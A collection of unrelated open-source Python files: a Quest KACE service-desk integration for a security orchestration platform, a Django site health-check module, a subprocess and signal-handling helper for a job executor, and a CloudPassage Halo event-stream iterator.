headers = {
'Accept': 'application/json',
'x-dell-csrf-token': self._token,
'x-dell-api-version': '5',
'Cookie': self._cookie,
'Content-Type': 'application/json'
}
return self._http_request("DELETE", url_suffix=f"/service_desk/tickets/{ticket_id}", headers=headers)
def ticket_by_id_request(self, filtering_id: int) -> dict:
"""Specific ticket details by ID.
Args:
filtering_id: id for filtering by it.
Returns:
Response from API.
"""
headers = {
'Accept': 'application/json',
'x-dell-csrf-token': self._token,
'x-dell-api-version': '5',
'Cookie': self._cookie
}
filter_fields = f"id eq {filtering_id}"
return self._http_request("GET", url_suffix=f"/service_desk/tickets?filtering={filter_fields}", headers=headers)
def test_module(client: Client, *_) -> Tuple[str, dict, dict]:
"""Function which checks if there is a connection with the api.
Args:
client : Integration client which communicates with the api.
args: Users arguments of the command.
Returns:
human readable, context, raw response of this command.
"""
_ = client.machines_list_request()
client.update_token()
response = client.tickets_list_request()
list_tickets_res = response.get('Tickets')
if list_tickets_res and demisto.params().get('isFetch'):
parse_date_range(demisto.params().get('fetch_time'), date_format='%Y-%m-%dT%H:%M:%SZ')
parsed_time = (datetime.utcnow() - timedelta(days=20))
incidents, _ = parse_incidents(list_tickets_res, "1", '%Y-%m-%dT%H:%M:%SZ', parsed_time)
return 'ok', {}, {}
def get_machines_list_command(client, args) -> Tuple[str, dict, dict]:
"""Function which returns all machines in the system.
Args:
client : Integretion client which communicates with the api.
args: Users arguments of the command.
Returns:
human readable, context, raw response of this command.
"""
limit = int(args.get('limit', 50))
filter_fields = args.get('custom_filter')
response = client.machines_list_request(filter_fields)
raw_response = response.get('Machines')[:limit]
context = parse_response(raw_response)
human_readable_markdown = tableToMarkdown('Quest Kace Machines', context, removeNull=True, headers=['ID', 'Name',
'IP', 'Created',
'Modified',
'LastInventory',
'LastSync',
'ManualEntry',
'PagefileMaxSize',
'PagefileSize',
'RamTotal',
'RamUsed'])
context = {
'QuestKace.Machine(val.ID === obj.ID)': context
}
return human_readable_markdown, context, raw_response
def get_assets_list_command(client, args) -> Tuple[str, dict, dict]:
"""Function which returns all assets in the system.
Args:
client : Integretion client which communicates with the api.
args: Users arguments of the command.
Returns:
human readable, context, raw response of this command.
"""
limit = int(args.get('limit', 50))
filter_fields = args.get('custom_filter')
response = client.assets_list_request(filter_fields)
raw_response = response.get('Assets')[:limit]
context = parse_response(raw_response)
human_readable_markdown = tableToMarkdown('Quest Kace Assets', context, removeNull=True,
headers=['ID', 'Name', 'Created', 'Modified', 'OwnerID', 'MappedID',
'AssetClassID', 'AssetDataID', 'AssetStatusID', 'AssetTypeID',
'AssetTypeName'])
context = {
'QuestKace.Asset(val.ID === obj.ID)': context
}
return human_readable_markdown, context, raw_response
def get_queues_list_command(client, args) -> Tuple[str, dict, dict]:
"""Function which returns all queues in the system.
Args:
client : Integretion client which communicates with the api.
args: Users arguments of the command.
Returns:
human readable, context, raw response of this command.
"""
filter_fields = args.get('custom_filter')
limit = int(args.get('limit', 50))
response = client.queues_list_request(filter_fields)
raw_response = response.get('Queues')[:limit]
context = parse_response(raw_response)
human_readable_markdown = tableToMarkdown('Quest Kace Queues', context, removeNull=True,
headers=['ID', 'Name', 'Fields'])
context = {
'QuestKace.Queue(val.ID === obj.ID)': context
}
return human_readable_markdown, context, raw_response
def get_tickets_list_command(client, args) -> Tuple[str, dict, dict]:
"""Function which returns all tickets in the system.
Args:
client : Integretion client which communicates with the api.
args: Users arguments of the command.
Returns:
human readable, context, raw response of this command.
"""
limit = int(args.get('limit', 50))
custom_shaping = args.get("custom_shaping")
custom_filter = args.get("custom_filter")
response = client.tickets_list_request(custom_shaping, custom_filter)
raw_response = response.get('Tickets')[:limit]
context = parse_response(raw_response)
for response in context:
response['IsDeleted'] = False
human_readable_markdown = tableToMarkdown('Quest Kace Tickets', context, removeNull=True,
headers=['ID', 'Title', 'Created', 'Modified', 'HdQueueID', 'DueDate'])
context = {
'QuestKace.Ticket(val.ID === obj.ID)': context
}
return human_readable_markdown, context, raw_response
def create_ticket_command(client, args) -> Tuple[str, dict, dict]:
"""Function which creates a new ticket to the system according to users arguments.
Args:
client : Integretion client which communicates with the api.
args: Users arguments of the command.
Returns:
human readable, context, raw response of this command.
"""
impact = None
category = None
status = None
priority = None
hd_queue_id = args.get('queue_id')
custom_fields = args.get('custom_fields')
if (custom_fields and "hd_queue_id" not in custom_fields) and (not hd_queue_id):
raise DemistoException("hd_queue_id is a mandatory value, please add it.")
title = args.get("title")
summary = args.get('summary')
if args.get('impact'):
dict_of_obj = TICKETS_OBJECTS.get('impact')
impact = args.get('impact')
if dict_of_obj:
impact = dict_of_obj.get(args.get('impact'), args.get('impact'))
if args.get('category'):
dict_of_obj = TICKETS_OBJECTS.get('category')
impact = args.get('category')
if dict_of_obj:
impact = dict_of_obj.get(args.get('category'), args.get('category'))
if args.get('status'):
dict_of_obj = TICKETS_OBJECTS.get('status')
impact = args.get('status')
if dict_of_obj:
impact = dict_of_obj.get(args.get('status'), args.get('status'))
if args.get('priority'):
dict_of_obj = TICKETS_OBJECTS.get('priority')
impact = args.get('priority')
if dict_of_obj:
impact = dict_of_obj.get(args.get('priority'), args.get('priority'))
machine = args.get('machine')
asset = args.get('asset')
body_from_args = create_body_from_args(hd_queue_id, title, summary, impact, category, status, priority, machine,
asset)
if custom_fields:
splited = split_fields(custom_fields)
body_from_args.update(splited)
temp_data = {'Tickets': [body_from_args]}
data = json.dumps(temp_data)
response = client.create_ticket_request(data)
if response.get('Result') != 'Success':
raise DemistoException('Error while adding a new ticket.')
try:
id = response.get('IDs')[0]
except Exception as e:
raise DemistoException(e)
client.update_token()
res = client.ticket_by_id_request(id)
ticket = res.get('Tickets')
ticket_view = tableToMarkdown(f'New ticket was added successfully, ticket number {id}.\n', ticket)
return ticket_view, {}, {}
def create_body_from_args(hd_queue_id: Union[str, int] = None, title: Union[str, int] = None,
summary: Union[str, int] = None, impact: Union[str, int] = None,
category: Union[str, int] = None, status: Union[str, int] = None,
priority: Union[str, int] = None, machine: Union[str, int] = None,
asset: Union[str, int] = None) -> dict:
"""Function which creates the body of the request from user arguments.
Args:
hd_queue_id: the queue number to insert the ticket to.
title: title of the ticket.
summary: summary of the ticket.
impact: impact of the ticket.
category: category of the ticket.
status: status of the ticket.
priority: priority of the ticket.
machine: machine of the ticket.
asset: asset of the ticket.
Returns:
body of the request as a dict.
"""
body = {}
if hd_queue_id:
body.update({'hd_queue_id': hd_queue_id})
if title:
body.update({'title': title})
if summary:
body.update({'summary': summary})
if impact:
body.update({'impact': impact})
if category:
body.update({'category': category})
if status:
body.update({'status': status})
if priority:
body.update({'priority': priority})
if machine:
body.update({'machine': machine})
if asset:
body.update({'asset': asset})
return body
def update_ticket_command(client, args) -> Tuple[str, dict, dict]:
"""Function which updates the body of the request from user arguments.
Args:
client : Integretion client which communicates with the api.
args: Users arguments of the command.
Returns:
human readable, context, raw response of this command.
"""
impact = None
category = None
status = None
priority = None
ticket_id = args.get('ticket_id')
title = args.get("title")
summary = args.get('summary')
if args.get('impact'):
impact = TICKETS_OBJECTS['impact'][args.get('impact')]
if args.get('category'):
category = TICKETS_OBJECTS['category'][args.get('category')]
if args.get('status'):
status = TICKETS_OBJECTS['status'][args.get('status')]
if args.get('priority'):
priority = TICKETS_OBJECTS['priority'][args.get('priority')]
machine = args.get('machine')
asset = args.get('asset')
custom_fields = args.get('custom_fields')
body_from_args = create_body_from_args(title=title, summary=summary, impact=impact, category=category,
status=status,
priority=priority, machine=machine, asset=asset)
if custom_fields:
splited = split_fields(custom_fields)
body_from_args.update(splited)
temp_data = {'Tickets': [body_from_args]}
data = json.dumps(temp_data)
response = client.update_ticket_request(ticket_id, data)
if response.get('Result') != 'Success':
raise DemistoException('Error while updating the ticket.')
client.update_token()
res = client.ticket_by_id_request(ticket_id)
ticket = res.get('Tickets')
ticket_view = tableToMarkdown(f'Ticket number {ticket_id} was updated successfully.\n', ticket)
return ticket_view, {}, {}
def delete_ticket_command(client, args) -> Tuple[str, dict, dict]:
"""Function which deleted a specific ticket by ticket id.
Args:
client : Integretion client which communicates with the api.
args: Users arguments of the command.
Returns:
human readable, context, raw response of this command.
"""
ticket_id = args.get('ticket_id')
try:
response = client.delete_ticket_request(ticket_id)
except Exception as e:
raise DemistoException(e)
if response.get('Result') == 'Success':
context = {}
old_context = demisto.dt(demisto.context(), f'QuestKace.Ticket(val.ID === {ticket_id})')
if old_context:
if isinstance(old_context, list):
old_context = old_context[0]
old_context['IsDeleted'] = True
context = {
'QuestKace.Ticket(val.ID === obj.ID)': old_context
}
return f'Ticket was deleted successfully. Ticket number {ticket_id}', context, {}
else:
raise DemistoException('Error while deleting the ticket.')
def fetch_incidents(client: Client, fetch_time: str, fetch_shaping: str, last_run: Dict, fetch_limit: str,
fetch_queue_id: Optional[list] = None, fetch_filter: Optional[str] = None) -> list:
"""
This function will execute each interval (default is 1 minute).
Args:
client (Client): Quest Kace Client
fetch_time: time interval for fetch incidents.
fetch_shaping: shaping for the request.
fetch_filter: custom filters for the request.
fetch_limit: limit for number of fetch incidents per fetch.
fetch_queue_id: queue id for fetch, if not given then fetch runs on all tickets in the system
last_run (dateparser.time): The greatest incident created_time we fetched from last fetch
Returns:
incidents: Incidents that will be created in Demisto
"""
if not fetch_queue_id or fetch_queue_id[0] == 'All':
fetch_queue_id = get_queue_ids(client)
time_format = '%Y-%m-%dT%H:%M:%SZ'
if not last_run: # if first time running
new_last_run = {'last_fetch': parse_date_range(fetch_time, date_format=time_format)[0]}
else:
new_last_run = last_run
if not fetch_shaping:
fetch_shaping = shaping_fetch(client, fetch_queue_id)
parsed_last_time = datetime.strptime(new_last_run.get('last_fetch', ''), time_format)
fetch_filter_for_query = f'created gt {parsed_last_time}'
if fetch_queue_id:
queue_id_str = ';'.join(fetch_queue_id)
filter_by_queue_id = f'hd_queue_id in {queue_id_str}'
fetch_filter_for_query = f'{fetch_filter_for_query},{filter_by_queue_id}'
if fetch_filter:
fetch_filter_for_query = f'{fetch_filter_for_query},{fetch_filter}'
demisto.info(f"Fetching Incident has Started,\n"
f"Fetch filter is {fetch_filter_for_query}\n"
f"Last fetch was on {str(parsed_last_time)}")
client.update_token()
items: dict = client.tickets_list_request(fetch_shaping, fetch_filter_for_query)
items: list = items.get('Tickets', [])
incidents, last_incident_time = parse_incidents(items, fetch_limit, time_format, parsed_last_time)
last_incident_time = last_incident_time.strftime(time_format)
demisto.info(f"Fetching Incident has Finished\n"
f"Fetch limit was {fetch_limit}"
f"Last fetch was on {str(last_incident_time)}\n"
f"Number of incidents was {len(incidents)}")
demisto.setLastRun({'last_fetch': last_incident_time})
return incidents
def shaping_fetch(client: Client, fetch_queue_id: list) -> str:
"""
Create and Update shaping fields once a day and saves them in integration context.
Args:
client: Client for the api.
fetch_queue_id:
Returns:
the current shaping.
"""
integration_context = demisto.getIntegrationContext()
if integration_context:
valid_until = integration_context.get('valid_until')
time_now = int(time.time())
if time_now < valid_until:
fetch_shaping = integration_context.get('shaping_fields')
else:
fetch_shaping = set_shaping(client, fetch_queue_id)
integration_context = {
'shaping_fields': fetch_shaping,
'valid_until': int(time.time()) + 3600 * 24
}
demisto.setIntegrationContext(integration_context)
else:
fetch_shaping = set_shaping(client, fetch_queue_id)
integration_context = {
'shaping_fields': fetch_shaping,
'valid_until': int(time.time()) + 3600 * 24
}
demisto.setIntegrationContext(integration_context)
return fetch_shaping
def get_fields_by_queue(client, queue: Optional[list]) -> list:
"""
Creating a list of all queue ids that are in the system.
Args:
client: Client for the api.
Returns:
list of queue ids.
"""
if queue:
queues_id = queue
else:
queues_id = get_queue_ids(client)
fields: list = []
for q in queues_id:
client.update_token()
fields_by_queue = client.queues_list_fields_request(queue_number=str(q))
fields_by_queue = fields_by_queue.get('Fields', [])
for field in fields_by_queue:
if field.get('jsonKey') not in fields:
# get internal error 500 from server with related tickets
if field.get('jsonKey') != 'related_tickets' and field.get('jsonKey') != 'referring_tickets':
fields.append(field.get('jsonKey'))
return fields
def get_queue_ids(client: Client) -> list:
"""
Creating a list of all queue ids that are in the system.
Args:
client: Client for the api.
Returns:
list of queue ids.
"""
queues = client.queues_list_request()
queues = queues.get('Queues', [])
queues_id = []
for q in queues:
queues_id.append(str(q.get('id')))
return queues_id
def shaping_by_fields(fields: list) -> str:
"""
Creating a shaping for the request which is from the fields and seperated by comma's
Args:
fields: List of fields that would be part of the shaping.
Returns:
str of the shaping.
"""
shaping = 'hd_ticket all'
for field in fields:
shaping += f',{field} limited'
return shaping
def set_shaping(client, queue: Optional[list] = None) -> str:
"""
Creating a shaping for the request.
Args:
client: Client in order to get the queue fields.
queue: If specific queue is given for the shaping.
Returns:
str of the shaping.
"""
fields = get_fields_by_queue(client, queue)
shaping = shaping_by_fields(fields)
return shaping
def parse_incidents(items: list, fetch_limit: str, time_format: str, parsed_last_time: datetime) \
-> Tuple[list, Any]:
"""
This function will create a list of incidents
Args:
items : List of tickets of the api response.
fetch_limit: Limit for incidents of fetch cycle.
time_format: Time format of the integration.
parsed_last_time: limit for number of fetch incidents per fetch.
Returns:
incidents: List of incidents.
parsed_last_time: Time of last incident.
"""
count = 0
incidents = []
for item in items:
if count >= int(fetch_limit):
break
incident_created_time = dateparser.parse(item['created'])
incident = {
'name': item['title'],
'occurred': incident_created_time.strftime(time_format),
'rawJSON': json.dumps(item)
}
incidents.append(incident)
count += 1
parsed_last_time = incident_created_time
return incidents, parsed_last_time
def split_fields(fields: str = '') -> dict:
"""Split str fields of Demisto arguments to request fields by the char ';'.
Args:
fields: fields in a string representation.
Returns:
dic_fields object for request.
"""
dic_fields = {}
if fields:
if '=' not in fields:
raise Exception(
f"The argument: {fields}.\nmust contain a '=' to specify the keys and values. e.g: key=val.")
arr_fields = fields.split(';')
for f in arr_fields:
field = f.split('=', 1) # a field might include a '=' sign in the value. thus, splitting only once.
if len(field) > 1:
dic_fields[field[0]] = field[1]
return dic_fields
def main():
"""
PARSE AND VALIDATE INTEGRATION PARAMS
"""
params = demisto.params()
username = params.get('credentials').get("identifier")
password = params.get('credentials').get('password')
base_url = params.get('url')
proxy = demisto.params().get('proxy', False)
verify_certificate = not params.get('insecure', False)
# fetch incidents params
fetch_limit = params.get('fetch_limit', 10)
fetch_time = params.get('fetch_time', '1 day')
fetch_shaping = params.get('fetch_shaping')
fetch_filter = params.get('fetch_filter')
fetch_queue_id = argToList(params.get('fetch_queue_id'))
try:
client = Client(
url=base_url,
username=username,
password=password,
verify=verify_certificate,
proxy=proxy)
command = demisto.command()
LOG(f'Command being called is {command}')
# Commands dict
commands: Dict[str, Callable[[Client, Dict[str, str]], Tuple[str, dict, dict]]] = {
'test-module': test_module,
'kace-machines-list': get_machines_list_command,
'kace-assets-list': get_assets_list_command,
'kace-queues-list': get_queues_list_command,
'kace-tickets-list': get_tickets_list_command,
'kace-ticket-create': create_ticket_command,
'kace-ticket-update': update_ticket_command,
'kace-ticket-delete': delete_ticket_command,
}
if command in commands:
return_outputs(*commands[command](client, demisto.args()))
elif command == 'fetch-incidents':
incidents = fetch_incidents(client, fetch_time=fetch_time, fetch_shaping=fetch_shaping,
fetch_filter=fetch_filter, fetch_limit=fetch_limit,
fetch_queue_id=fetch_queue_id, last_run=demisto.getLastRun())
demisto.incidents(incidents)
else:
raise NotImplementedError(f'{command} is not an existing QuestKace command')
except Exception as e:
return_error(f'Error from QuestKace Integration.\n'
f'Failed to execute {demisto.command()} command.\n\n Error: {str(e)}')
if __name__ in ('__main__', '__builtin__', 'builtins'):
main()
|
VirusTotal/content
|
Packs/QuestKace/Integrations/QuestKace/QuestKace.py
|
Python
|
mit
| 36,041
|
import os
import socket
import StringIO
import tempfile
import time
import traceback
from django.conf import settings
import commonware.log
import requests
from PIL import Image
import amo.search
from amo.utils import memoize
from applications.management.commands import dump_apps
from lib.crypto import packaged, receipt
from lib.crypto.packaged import SigningError as PackageSigningError
from lib.crypto.receipt import SigningError
from lib.pay_server import client
monitor_log = commonware.log.getLogger('z.monitor')
def memcache():
memcache = getattr(settings, 'CACHES', {}).get('default')
memcache_results = []
status = ''
if memcache and 'memcache' in memcache['BACKEND']:
hosts = memcache['LOCATION']
if not isinstance(hosts, (tuple, list)):
hosts = [hosts]
for host in hosts:
ip, port = host.split(':')
try:
s = socket.socket()
s.connect((ip, int(port)))
except Exception, e:
result = False
status = 'Failed to connect to memcached (%s): %s' % (host, e)
monitor_log.critical(status)
else:
result = True
finally:
s.close()
memcache_results.append((ip, port, result))
if len(memcache_results) < 2:
status = ('2+ memcache servers are required.'
'%s available') % len(memcache_results)
monitor_log.warning(status)
if not memcache_results:
status = 'Memcache is not configured'
monitor_log.info(status)
return status, memcache_results
def libraries():
# Check Libraries and versions
libraries_results = []
status = ''
try:
Image.new('RGB', (16, 16)).save(StringIO.StringIO(), 'JPEG')
libraries_results.append(('PIL+JPEG', True, 'Got it!'))
except Exception, e:
msg = "Failed to create a jpeg image: %s" % e
libraries_results.append(('PIL+JPEG', False, msg))
try:
import M2Crypto # NOQA
libraries_results.append(('M2Crypto', True, 'Got it!'))
except ImportError:
libraries_results.append(('M2Crypto', False, 'Failed to import'))
if settings.SPIDERMONKEY:
if os.access(settings.SPIDERMONKEY, os.R_OK):
libraries_results.append(('Spidermonkey is ready!', True, None))
# TODO: see if it works?
else:
msg = "You said spidermonkey was at (%s)" % settings.SPIDERMONKEY
libraries_results.append(('Spidermonkey', False, msg))
else:
msg = "Please set SPIDERMONKEY in your settings file."
libraries_results.append(('Spidermonkey', False, msg))
missing_libs = [l for l, s, m in libraries_results if not s]
if missing_libs:
status = 'missing libs: %s' % ",".join(missing_libs)
return status, libraries_results
def elastic():
elastic_results = None
status = ''
try:
health = amo.search.get_es().cluster_health()
if health['status'] == 'red':
status = 'ES is red'
elastic_results = health
except Exception:
elastic_results = traceback.format_exc()
return status, elastic_results
def path():
# Check file paths / permissions
rw = (settings.TMP_PATH,
settings.NETAPP_STORAGE,
settings.UPLOADS_PATH,
settings.ADDONS_PATH,
settings.MIRROR_STAGE_PATH,
settings.GUARDED_ADDONS_PATH,
settings.ADDON_ICONS_PATH,
settings.COLLECTIONS_ICON_PATH,
settings.PACKAGER_PATH,
settings.PREVIEWS_PATH,
settings.USERPICS_PATH,
settings.REVIEWER_ATTACHMENTS_PATH,
dump_apps.Command.JSON_PATH,)
r = [os.path.join(settings.ROOT, 'locale'),
# The deploy process will want write access to this.
# We do not want Django to have write access though.
settings.PROD_DETAILS_DIR]
filepaths = [(path, os.R_OK | os.W_OK, "We want read + write")
for path in rw]
filepaths += [(path, os.R_OK, "We want read") for path in r]
filepath_results = []
filepath_status = True
for path, perms, notes in filepaths:
path_exists = os.path.exists(path)
path_perms = os.access(path, perms)
filepath_status = filepath_status and path_exists and path_perms
filepath_results.append((path, path_exists, path_perms, notes))
key_exists = os.path.exists(settings.WEBAPPS_RECEIPT_KEY)
key_perms = os.access(settings.WEBAPPS_RECEIPT_KEY, os.R_OK)
filepath_status = filepath_status and key_exists and key_perms
filepath_results.append(('settings.WEBAPPS_RECEIPT_KEY',
key_exists, key_perms, 'We want read'))
status = filepath_status
status = ''
if not filepath_status:
status = 'check main status page for broken perms'
return status, filepath_results
def redis():
# Check Redis
redis_results = [None, 'REDIS_BACKENDS is not set']
status = 'REDIS_BACKENDS is not set'
if getattr(settings, 'REDIS_BACKENDS', False):
import redisutils
status = []
redis_results = {}
for alias, redis in redisutils.connections.iteritems():
try:
redis_results[alias] = redis.info()
except Exception, e:
redis_results[alias] = None
status.append('Failed to chat with redis:%s' % alias)
monitor_log.critical('Failed to chat with redis: (%s)' % e)
status = ','.join(status)
return status, redis_results
# The signer check actually asks the signing server to sign something. Do this
# once per nagios check, once per web head might be a bit much. The memoize
# slows it down a bit, by caching the result for 15 seconds.
@memoize('monitors-signer', time=15)
def receipt_signer():
destination = getattr(settings, 'SIGNING_SERVER', None)
if not destination:
return '', 'Signer is not configured.'
# Just send some test data into the signer.
now = int(time.time())
not_valid = (settings.SITE_URL + '/not-valid')
data = {'detail': not_valid, 'exp': now + 3600, 'iat': now,
'iss': settings.SITE_URL,
'product': {'storedata': 'id=1', 'url': u'http://not-valid.com'},
'nbf': now, 'typ': 'purchase-receipt',
'reissue': not_valid,
'user': {'type': 'directed-identifier',
'value': u'something-not-valid'},
'verify': not_valid
}
try:
result = receipt.sign(data)
except SigningError as err:
msg = 'Error on signing (%s): %s' % (destination, err)
return msg, msg
try:
cert, rest = receipt.crack(result)
except Exception as err:
msg = 'Error on cracking receipt (%s): %s' % (destination, err)
return msg, msg
# Check that the certs used to sign the receipts are not about to expire.
limit = now + (60 * 60 * 24) # One day.
if cert['exp'] < limit:
msg = 'Cert will expire soon (%s)' % destination
return msg, msg
cert_err_msg = 'Error on checking public cert (%s): %s'
location = cert['iss']
try:
resp = requests.get(location, timeout=5, stream=False)
except Exception as err:
msg = cert_err_msg % (location, err)
return msg, msg
if not resp.ok:
msg = cert_err_msg % (location, resp.reason)
return msg, msg
cert_json = resp.json()
if not cert_json or not 'jwk' in cert_json:
msg = cert_err_msg % (location, 'Not valid JSON/JWK')
return msg, msg
return '', 'Signer working and up to date'
# Like the receipt signer above this asks the packaged app signing
# service to sign one for us.
@memoize('monitors-package-signer', time=60)
def package_signer():
destination = getattr(settings, 'SIGNED_APPS_SERVER', None)
if not destination:
return '', 'Signer is not configured.'
app_path = os.path.join(os.path.dirname(os.path.abspath(__file__)),
'nagios_check_packaged_app.zip')
signed_path = tempfile.mktemp()
try:
packaged.sign_app(app_path, signed_path, None, False)
return '', 'Package signer working'
except PackageSigningError, e:
msg = 'Error on package signing (%s): %s' % (destination, e)
return msg, msg
finally:
os.unlink(signed_path)
# Not called settings to avoid conflict with django.conf.settings.
def settings_check():
if not settings.MARKETPLACE:
return '', 'No required settings checked on amo'
required = ['APP_PURCHASE_KEY', 'APP_PURCHASE_TYP', 'APP_PURCHASE_AUD',
'APP_PURCHASE_SECRET']
for key in required:
if not getattr(settings, key):
msg = 'Missing required value %s' % key
return msg, msg
return '', 'Required settings ok'
def solitude():
if not settings.MARKETPLACE:
return '', 'Solitude access not required on amo'
try:
res = client.api.services.request.get()
except Exception as err:
return repr(err), repr(err)
auth = res.get('authenticated', None)
if auth != 'marketplace':
msg = 'Solitude authenticated as: %s' % auth
return msg, msg
return '', 'Solitude authentication ok'
|
Joergen/zamboni
|
apps/amo/monitors.py
|
Python
|
bsd-3-clause
| 9,414
|
"""This module provides helper functions for subprocess management."""
import logging
import signal
import subprocess
import sys
import os
import psutil
import cook
import cook.io_helper as cio
def launch_process(command, environment):
"""Launches the process using the command and specified environment.
Parameters
----------
command: string
The command to execute.
environment: dictionary
The environment.
Returns
-------
The launched process.
"""
if not command:
logging.warning('No command provided!')
return None
# The preexec_fn is run after the fork() but before exec() to run the shell.
# setsid will run the program in a new session, thus assigning a new process group to it and its children.
return subprocess.Popen(command,
bufsize=0,
env=environment,
preexec_fn=os.setsid,
shell=True,
stderr=sys.stderr,
stdout=sys.stdout)
def is_process_running(process):
"""Checks whether the process is still running.
Parameters
----------
process: subprocess.Popen
The process to query
Returns
-------
whether the process is still running.
"""
return process.poll() is None
def find_process_group(process_id):
"""Return the process group id of the process with process id process_id.
Parameters
----------
process_id: int
The process id.
Returns
-------
The process group id of the process with process id process_id or None.
"""
try:
group_id = os.getpgid(process_id)
logging.info('Process (pid: {}) belongs to group (id: {})'.format(process_id, group_id))
return group_id
except ProcessLookupError:
logging.info('Unable to find group for process (pid: {})'.format(process_id))
except Exception:
logging.exception('Error in finding group for process (pid: {})'.format(process_id))
def _send_signal_to_process(process_id, signal_to_send):
"""Send the signal_to_send signal to the process with process_id.
Parameters
----------
process_id: int
The id of the process whose group to kill.
signal_to_send: signal.Signals enum
The signal to send to the process group.
Returns
-------
True if the signal was sent successfully.
"""
signal_name = signal_to_send.name
try:
logging.info('Sending {} to process (id: {})'.format(signal_name, process_id))
os.kill(process_id, signal_to_send)
return True
except ProcessLookupError:
logging.info('Unable to send {} as could not find process (id: {})'.format(signal_name, process_id))
except Exception:
logging.exception('Error in sending {} to process (id: {})'.format(signal_name, process_id))
return False
def _send_signal_to_process_tree(root_process_id, signal_to_send):
"""Send the signal_to_send signal to the process tree rooted at process_id.
Parameters
----------
process_id: int
The id of the root process.
signal_to_send: signal.Signals enum
The signal to send to the process group.
Returns
-------
True if the signal was sent successfully.
"""
signal_name = signal_to_send.name
logging.info('Sending {} to process tree rooted at (id: {})'.format(signal_name, root_process_id))
process_queue = [root_process_id]
visited_process_ids = set()
num_processes_found = 0
num_processes_killed = 0
signal_sent_to_all_processes_successfully = True
while process_queue:
loop_process_id = process_queue.pop(0)
num_processes_found += 1
try:
visited_process_ids.add(loop_process_id)
# Stop the process to keep it from forking since a forked child might get re-parented
_send_signal_to_process(loop_process_id, signal.SIGSTOP)
# Now safe to retrieve the children
process = psutil.Process(loop_process_id)
children = process.children()
[process_queue.append(child.pid) for child in children if child.pid not in visited_process_ids]
if _send_signal_to_process(loop_process_id, signal_to_send):
num_processes_killed += 1
else:
signal_sent_to_all_processes_successfully = False
except psutil.NoSuchProcess:
logging.info('Unable to send {} as could not find process (id: {})'.format(signal_name, loop_process_id))
except Exception:
logging.exception('Error in sending {} to process (id: {})'.format(signal_name, loop_process_id))
signal_sent_to_all_processes_successfully = False
log_message = 'Found {} process(es) in tree rooted at (id: {}), successfully sent {} to {} process(es)'
logging.info(log_message.format(num_processes_found, root_process_id, signal_name, num_processes_killed))
for loop_process_id in visited_process_ids:
# Try and continue the processes in case the signal is non-terminating but doesn't continue the process.
_send_signal_to_process(loop_process_id, signal.SIGCONT)
return signal_sent_to_all_processes_successfully
def _send_signal_to_process_group(process_id, signal_to_send):
"""Send the signal_to_send signal to the process group with group_id.
Parameters
----------
process_id: int
The id of the process whose group to kill.
signal_to_send: signal.Signals enum
The signal to send to the process group.
Returns
-------
True if the signal was sent successfully.
"""
signal_name = signal_to_send.name
try:
group_id = find_process_group(process_id)
if group_id:
logging.info('Sending {} to group (id: {})'.format(signal_name, group_id))
os.killpg(group_id, signal_to_send)
return True
except ProcessLookupError:
logging.info('Unable to send {} as could not find group (id: {})'.format(signal_name, group_id))
except Exception:
logging.exception('Error in sending {} to group (id: {})'.format(signal_name, group_id))
return False
def send_signal(process_id, signal_to_send):
"""Send the signal_to_send signal to the process with process_id.
The function uses a three-step mechanism:
1. It sends the signal to the process tree rooted at process_id;
2. If unsuccessful, it sends the signal to the process group of process_id;
3. If unsuccessful, it sends the signal directly to the process with id process_id."""
if process_id:
signal_name = signal_to_send.name
logging.info('Requested to send {} to process (id: {})'.format(signal_name, process_id))
if _send_signal_to_process_tree(process_id, signal_to_send):
logging.info('Successfully sent {} to process tree (id: {})'.format(signal_name, process_id))
elif _send_signal_to_process_group(process_id, signal_to_send):
logging.info('Successfully sent {} to group for process (id: {})'.format(signal_name, process_id))
elif _send_signal_to_process(process_id, signal_to_send):
logging.info('Successfully sent {} to process (id: {})'.format(signal_name, process_id))
else:
logging.info('Failed to send {} to process (id: {})'.format(signal_name, process_id))
def kill_process(process, shutdown_grace_period_ms):
"""Attempts to kill a process.
First attempt is made by sending the process a SIGTERM.
If the process does not terminate inside (shutdown_grace_period_ms - 100) ms, it is then sent a SIGKILL.
The 100 ms grace period is allocated for the executor to perform its other cleanup actions.
Parameters
----------
process: subprocess.Popen
The process to kill
shutdown_grace_period_ms: int
Grace period before forceful kill
Returns
-------
True if the process completed execution or was killed.
"""
shutdown_grace_period_ms = max(shutdown_grace_period_ms - (1000 * cook.TERMINATE_GRACE_SECS), 0)
if is_process_running(process):
logging.info('Waiting up to {} ms for process to terminate'.format(shutdown_grace_period_ms))
send_signal(process.pid, signal.SIGTERM)
shutdown_grace_period_secs = shutdown_grace_period_ms / 1000.0
try:
process.wait(shutdown_grace_period_secs)
cio.print_and_log('Command terminated with signal Terminated (pid: {})'.format(process.pid))
except subprocess.TimeoutExpired:
logging.info('Process did not terminate via SIGTERM after {} seconds'.format(shutdown_grace_period_secs))
except Exception:
logging.exception('Error while sending SIGTERM to (pid: {})'.format(process.pid))
if is_process_running(process):
send_signal(process.pid, signal.SIGKILL)
try:
process.wait() # wait indefinitely for process to die/complete, it cannot ignore SIGKILL
cio.print_and_log('Command terminated with signal Killed (pid: {})'.format(process.pid))
except Exception:
logging.exception('Error while sending SIGKILL to (pid: {})'.format(process.pid))
return not is_process_running(process)
|
twosigma/Cook
|
executor/cook/subprocess.py
|
Python
|
apache-2.0
| 9,401
|
"""This class provides an iterator. Under the covers it does multi-threaded
consumption of events, only providing information to the iterator when it's
been ordered correctly."""
import cloudpassage
from halocelery.apputils import Utility as hc_util
class HaloEvents(object):
"""Instantiate with a donlib.ConfigHelper() object as an argument."""
def __init__(self, config):
self.halo_key = config.halo_api_key
self.halo_secret = config.halo_api_secret_key
self.halo_api_host = config.halo_api_host
self.halo_api_port = config.halo_api_port
self.ua = config.ua
self.start_timestamp = self.starting_event_time()
hc_util.log_stdout("Event Collector: Starting timestamp: " + self.start_timestamp) # NOQA
def __iter__(self):
"""This allows us to iterate through the events stream."""
session = self.build_halo_session()
streamer = cloudpassage.TimeSeries(session, self.start_timestamp,
"/v1/events", "events")
while True:
try:
for event in streamer:
yield event
except IndexError:
pass
def starting_event_time(self):
session = self.build_halo_session()
api = cloudpassage.HttpHelper(session)
url = "/v1/events?sort_by=created_at.desc&per_page=1"
resp = api.get(url)
return resp['events'][0]['created_at']
def build_halo_session(self):
"""This creates the halo session object for API interaction."""
session = cloudpassage.HaloSession(self.halo_key, self.halo_secret,
api_host=self.halo_api_host,
api_port=self.halo_api_port,
integration_string=self.ua)
return session
|
ashmastaflash/don-bot
|
app/donlib/halo_events.py
|
Python
|
bsd-3-clause
| 1,891
|
